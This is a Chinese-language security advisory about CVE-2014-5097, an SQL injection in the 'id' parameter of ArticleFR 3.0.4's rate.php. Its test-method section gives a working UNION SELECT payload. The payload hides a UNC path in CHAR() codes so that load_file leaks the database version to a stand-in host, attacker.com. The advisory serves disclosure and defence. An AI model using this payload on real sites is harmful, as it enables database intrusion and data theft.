ArticleFR 'id'参数SQL注入漏洞

发布日期:2014-08-20
更新日期:2014-08-25

受影响系统:
freereprintables ArticleFR 3.0.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69307
 CVE(CAN) ID: CVE-2014-5097
 
ArticleFR是自由文章目录CMS系统。
 
ArticleFR 3.0.4及其他版本没有有效过滤"/rate.php"脚本的"id" HTTP GET参数值,远程攻击者通过精心构造的HTTP GET请求利用此漏洞在应用的数据库内执行SQL命令。
 
<*来源:High-Tech Bridge Security Research Lab
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
?act=get&amp;amp;id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
freereprintables
 ----------------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/71500079b1d71f777dd96f80c14e942d.html